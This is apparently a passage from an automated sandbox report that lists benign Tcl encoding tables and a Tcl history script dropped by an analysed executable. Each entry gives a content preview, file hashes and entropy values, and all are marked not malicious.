                                                                                                                                                                                                                              Preview:# Encoding file: macCyrillic, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..202000B0049000A300A7202200B6040600AE00A9212204020452226004030453..221E00B122642265045600B504910408040404540407045704090459040A045A..0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455..20132014201C201D2018201900F7201E040E045E040F045F211604010451044F..0430043104320433
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1116
                                                                                                                                                                                                                              Entropy (8bit):3.870022681111701
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:87JMHkUlJvRjmf9RCsUBOdXsCbbNviANpkDP1XFAoE4xSF5HrBPkdn:87KvlA9RCs6CXrViANUP1XFA9eSvdPKn
                                                                                                                                                                                                                              MD5:DCE78527E3A7B7CB1DE9EE5FAF12AFC6
                                                                                                                                                                                                                              SHA1:20F4A3F4DB6B3422C04EBB6B21A568E4C173F9C1
                                                                                                                                                                                                                              SHA-256:062E31D48DC33160999074E49205E08C3655DFF91C2C87F254522E6EBCE2DD96
                                                                                                                                                                                                                              SHA-512:627F5FD2F12B341F2D7EE9032946FE057C4AC74D99687178CEA98B3E150307BB6AA2495B0FA46400760D467E2BF589BE31E998E25CE1D1E8465DA61F22047345
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macDingbats, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00202701270227032704260E2706270727082709261B261E270C270D270E270F..2710271127122713271427152716271727182719271A271B271C271D271E271F..2720272127222723272427252726272726052729272A272B272C272D272E272F..2730273127322733273427352736273727382739273A273B273C273D273E273F..2740274127422743274427452746274727482749274A274B25CF274D25A0274F..27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F..F8D7F8D8F8D9F8DAF8DBF8DCF8DDF8DEF8DFF8E0F8E1F8E2F8E3F8E4008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000276127622763276427652766276726632666266526602460246124622463..2464246524662467246824692776277727782779277A277B277C277D277E277F..2780278127822783278427852786278727882789278A278B278C278D278E278F..2790279127922793279421922194219527982799279A279B279C279D279E279F..27A027A127A227A3
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1113
                                                                                                                                                                                                                              Entropy (8bit):3.4954458011071323
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8dOHVBUlJvRj7SOVbusZhAMiZyi77qJlbaBMD2aSY5us36Ekp1ysOSU2imR:8kMlBVnrAMiwMm7aKPVusqx1ysOJjmR
                                                                                                                                                                                                                              MD5:0CC92F685A4132BE4B030006670D81CE
                                                                                                                                                                                                                              SHA1:13B1074A90055E9EA061A6206A9C004DA29967A9
                                                                                                                                                                                                                              SHA-256:1AABE561B5C944ABD11C293D4ACAC0F3A4A5A9E84A0342D066F4E3E992348895
                                                                                                                                                                                                                              SHA-512:E1AF3D47D681CD68B6063DEC1241631CABE86FE835232FA73D855AC74D0175540D46511282BE7198A67A37970A5D05CDECF55C10424ED9C1413C108F116094D9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macGreek, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400B900B200C900B300D600DC038500E000E200E4038400A800E700E900E8..00EA00EB00A3212200EE00EF202200BD203000F400F600A600AD00F900FB00FC..2020039303940398039B039E03A000DF00AE00A903A303AA00A7226000B000B7..039100B12264226500A503920395039603970399039A039C03A603AB03A803A9..03AC039D00AC039F03A1224803A400AB00BB202600A003A503A7038603880153..20132015201C201D2018201900F70389038A038C038E03AD03AE03AF03CC038F..03CD03B103B203C803B
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.3991839018654573
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8KHVBUlJvRj7SOVbusZhAMiZyi77qscqMVmOZmk/LYRldjY/g4JyMWG:8KMlBVnrAMiwMmzqi/LYRlYBEXG
                                                                                                                                                                                                                              MD5:747ADBE54D6992467415E322326FA1B9
                                                                                                                                                                                                                              SHA1:5E3967B5DDF3A6DBF07E90ED6B9B9C2F3F3F35FE
                                                                                                                                                                                                                              SHA-256:6FD08CE6FBA521D51E8058DE5C2DBD6583B80306A8BE7D015361F76314E70A35
                                                                                                                                                                                                                              SHA-512:A04B946993985BF1F8FBA3A7A9AD3838F43F8F27F69B1FB1015D9DC8612AAFCE24E30CBC1FCABBDFB359FD487D51F70F18DA0CDA4A87749A2C82309CEB054849
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macIceland, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..00DD00B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC00D000F000DE00FE..00FD00B7201A201E2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48813
                                                                                                                                                                                                                              Entropy (8bit):3.3767502114972077
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:K/RPrUHiJrKWkyY/W2wHiwWnwWOORY+gutSJi:KVUidzJCurDGSk
                                                                                                                                                                                                                              MD5:3DCD22325E0194AAD4959C939B1DE24D
                                                                                                                                                                                                                              SHA1:ABEF1372FBDA83714CE29E015D9A198D4B37B21C
                                                                                                                                                                                                                              SHA-256:47007D9EBF4D34C6CE3599E50AFC7C1CF8129B88994DE2C2A857C09003F9CD2B
                                                                                                                                                                                                                              SHA-512:B8ADFD2315EA38E5F7D4DED219759380069AAB539F1B5AAA5626CE32428CBBEB5E8215AD8351E023BCF72FA4DC30AB40CF59D6D45E33B6D1A6B41BEBFD4BD4C2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macJapan, multi-byte..M..003F 0 46..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00A0FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1113
                                                                                                                                                                                                                              Entropy (8bit):3.4060725247347516
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8THVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldjBpmg4JyMWG:8TMlBVnrAMiwMmOi/LYRlTsBEXG
                                                                                                                                                                                                                              MD5:34691FADC788B85D98F63159640C7DD0
                                                                                                                                                                                                                              SHA1:C8B3D084D3E831EFF6ECEF71B2029545F214C3D4
                                                                                                                                                                                                                              SHA-256:C83D971D6BC0284EF323C197896E38C57A5FF44784E451EC2997EDA70C0DD85C
                                                                                                                                                                                                                              SHA-512:77D5676F9B7AF7FD1D612A1C426889D8F2C0191887E180B78C4AA42202928A1B3078B76BD3C5F5ABB2A5CE1AE913E3CA6EFDE0483D2A2B0EFC173EF25EAE1D67
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macRoman, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC2039203AFB01FB02..202100B7201A201E203
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.412326247178521
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8tHVBUlJvRj7SOVbusZhAMiZyi77qsTMVZ5OZwYRldj/T9g4JyMWG:8tMlBVnrAMiwMmOA7YRlFT9BEXG
                                                                                                                                                                                                                              MD5:04E25073BFB0019D8381B72F7B433F00
                                                                                                                                                                                                                              SHA1:B63B0AD9F10A44B0DDD12A3BDBCDEB2992D6D385
                                                                                                                                                                                                                              SHA-256:0B805DAF21D37D702617A8C72C7345F857695108D905FF378791F291CEA150F0
                                                                                                                                                                                                                              SHA-512:0514EC054676C15C65B01B02747CDBAD79BC89FD1A24A17797A8729752FB748FEDBE920E7BBFF41A6DA4BA99002E3B8DB674D53E30485DC36F6BF737EAF11702
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macRomania, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A822600102015E..221E00B12264226500A500B522022211220F03C0222B00AA00BA21260103015F..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204400A42039203A01620163..202100B7201A201E2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):3.6062142626989004
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:88HVBUlJvRj7SOVbusZhAMiZyi77qqJipJwHmEU4AyqU+TpH:88MlBVnrAMiwMmqJ8Jf4AyqUe
                                                                                                                                                                                                                              MD5:06DC6BA6E4A75CD7FF2D7A4248912C61
                                                                                                                                                                                                                              SHA1:23FB16763A8F11EF48E805E4F453C2F812D48FC4
                                                                                                                                                                                                                              SHA-256:A1802A2FEB01B255EC7C17425EEE4525372DF8CE226F4047D149172EB438F913
                                                                                                                                                                                                                              SHA-512:41A487EC5C36C17B2746C5DC770882A836E6E75CF6A14C31595EB211022F0476BD3B953497C447F21554769F127C3A56E5B6EF8FB3C20A8AFF8C67E0CC94359D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macThai, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00AB00BB2026F88CF88FF892F895F898F88BF88EF891F894F897201C201DF899..FFFD2022F884F889F885F886F887F888F88AF88DF890F893F89620182019FFFD..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3AFEFF200B201320140E3F..0E400E410E420E430E44
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.422718883614008
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8QjHVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldD8g4JyS:88MlBVnrAMiwMmOi/LYRlWBES
                                                                                                                                                                                                                              MD5:4EA94A0DB35BED2081A2CC9D627A8180
                                                                                                                                                                                                                              SHA1:AB2AC3ADA19F3F656780FF876D5B536A8DCE92C6
                                                                                                                                                                                                                              SHA-256:AFB66138EBE9B87D8B070FE3B6E7D1A05ED508571E9E5B166C3314069D59B4E4
                                                                                                                                                                                                                              SHA-512:7888F560D3728732BE1B7DCE49ECB61F3399CEF11191F4116C891E1D147B2A90ED8FB4A5E7B51904A001C47750BD9EB1B15EA5BA5B4EC5D69CDE7704B69529AD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macTurkish, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178011E011F01300131015E015F..202100B7201A201E2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.4157626428238723
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8TzHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9a4piS1yk+5yye3cJd:8PMlBVnrAMiwMm8Y6zUk+UVsJd
                                                                                                                                                                                                                              MD5:A5B48D6F2678579CBE6EA094A4655071
                                                                                                                                                                                                                              SHA1:A13A41D530B21CE8443AFD7E811286537C5BA9C7
                                                                                                                                                                                                                              SHA-256:F7E11736C9FF30102B31EC72272754110193B347433F4B364921E8F131C92BF0
                                                                                                                                                                                                                              SHA-512:612F9D528CE940B5CA9E67CB127013A104655207511F4CF39C8696A127E6A8F4867F5603DCFB78C25A55668C6EE70F2997A8D1626F6F1DD44B19260967F17097
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macUkraine, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..202000B0049000A300A7202200B6040600AE00A9212204020452226004030453..221E00B122642265045600B504910408040404540407045704090459040A045A..0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455..20132014201C201D2018201900F7201E040E045E040F045F211604010451044F..04300431043204330
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):42552
                                                                                                                                                                                                                              Entropy (8bit):3.5565924983274857
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:w/RPrUHiJrwWkyY/W2wHiwWnwWOORY+gutSX:wVUid5JCurDGSX
                                                                                                                                                                                                                              MD5:EEB45AF9D7104872FE290D1EC18AB169
                                                                                                                                                                                                                              SHA1:A80CF4EA46301F0B8B4F0BC306270D7103753871
                                                                                                                                                                                                                              SHA-256:4A15ED210126BCDAE32543F60EB1A0677F985F32D49FCE923B9FAE8C5BCF3DA4
                                                                                                                                                                                                                              SHA-512:C359042B04441AA50E536B23EEA0C6C7B2C1893DFB9CDB5459D3B46945D3BB50FD7A32A4F4E26A83622E76D3D2BB0DBBC3D1F3FB87AAF40520A243165B82AB34
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: shiftjis, multi-byte..M..003F 0 40..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000850086008700000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.73983895892791
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:SdHkUlJvRjvRV7ZQsoRmSds2AsSemxUs+Jw1Viv6ObTXyn:avlJV7ZQsoRmosGSPxU/JOm6wTXyn
                                                                                                                                                                                                                              MD5:D59E748D863A5FAEF0CEEC2564E041A3
                                                                                                                                                                                                                              SHA1:4FFF3BE37F50C090FFC581F1C7769E20281E90C3
                                                                                                                                                                                                                              SHA-256:9660537A7B62996478555C6F57C1962C78FB3972F19370B2E395C44842818A1F
                                                                                                                                                                                                                              SHA-512:BF8FD0CF1CC55564C46976F53F441B26819ADBA7AB7BB04FF3FF5A313366FC3049DF29A839CCCB05EDEF4A7ECBB49FFCA62518EDA90AF2D7781874A8435073AE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: symbol, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002122000023220300250026220D002800292217002B002C2212002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..22450391039203A70394039503A603930397039903D1039A039B039C039D039F..03A0039803A103A303A403A503C203A9039E03A80396005B2234005D22A5005F..F8E503B103B203C703B403B503C603B303B703B903D503BA03BB03BC03BD03BF..03C003B803C103C303C403C503D603C903BE03C803B6007B007C007D223C007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..000003D2203222642044221E0192266326662665266021942190219121922193..00B000B12033226500D7221D2202202200F72260226122482026F8E6F8E721B5..21352111211C21182297229522052229222A2283228722842282228622082209..2220220700AE00A92122220F221A22C500AC2227222821D421D021D121D221D3..22C42329F8E8F8E9F8EA2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):3.0553142874336943
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:ZlHVBUlJvRj7SOVbusZhAMiZyi77qsDHmEU4AyqU+TWwdd:PMlBVnrAMiwMmss4AyqUSd
                                                                                                                                                                                                                              MD5:467A67DE6809B796B914F5BFF98EF46D
                                                                                                                                                                                                                              SHA1:C62418071A6C9CB0DCE3F67E130BFD2FB7AB0B58
                                                                                                                                                                                                                              SHA-256:50B62381D6EDD4219F4292BFDC365954491B23360DE7C08033E7218A3D29C970
                                                                                                                                                                                                                              SHA-512:BF98305AA7D759A087B9EABDC404714D8DC6B4F1BEED4ED0E1FFE646641E1AECA307673D64CF95FD09546D977B3409D6C04F56DCCA1D6332B0D9B6DD460B77A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: tis-620, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430E44
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8235
                                                                                                                                                                                                                              Entropy (8bit):4.855903177272536
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Hf8PxPu7pUHBpqyzmY5rEk/fvs+AokFlTGHts1H/tsEGZPBtsLIVn++G:H6Pu7ELJTtyli8Ozz+L
                                                                                                                                                                                                                              MD5:8609B624CD3EC63DD02DBF89455C3A9B
                                                                                                                                                                                                                              SHA1:B3E1843E34C38AA668FFDDF435A1A65D55449CA0
                                                                                                                                                                                                                              SHA-256:5123DB837EADF45712EA7D449BC40BFD3E8E16D3D71E7D0CE9A32F164973D767
                                                                                                                                                                                                                              SHA-512:B20B75473F34209888F38EE570B8A96061760E88466DFC2EC55C814968DC7F67D92D255E8635188B60455B88F2D1D517747613AD0F366D60412D2D6ECE231B0E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# history.tcl --..#..# Implementation of the history command...#..# Copyright (c) 1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#.....# The tcl::history array holds the history list and some additional..# bookkeeping variables...#..# nextid.the index used for the next history list item...# keep..the max size of the history list..# oldest.the index of the oldest item in the history.....namespace eval ::tcl {.. variable history.. if {![info exists history]} {...array set history {... nextid.0... keep.20... oldest.-20...}.. }.... namespace ensemble create -command ::tcl::history -map {...add.::tcl::HistAdd...change.::tcl::HistChange...clear.::tcl::HistClear...event.::tcl::HistEvent...info.::tcl::HistInfo...keep.::tcl::HistKeep...nextid.::tcl::HistNextID...redo.::tcl::HistRedo.. }..}.....# history --..#..#.This is the main history command. See the
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10066
                                                                                                                                                                                                                              Entropy (8bit):4.806771544139381
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:kipkqA3KsZMAikGJ4kIWPa95KTBoF7dg/8YNkgQ4id:TkqWKsZ8kGJ4kIWPaDFzTd
                                                                                                                                                                                                                              MD5:C2092F8CA2D761DFA8C461076D956374
                                                                                                                                                                                                                              SHA1:90B4648B3BC81C30465B0BE83A5DB4127A1392FB
                                                                                                                                                                                                                              SHA-256:8C474095A3ABA7DF5B488F3D35240D6DE729E57153980C2A898728B8C407A727
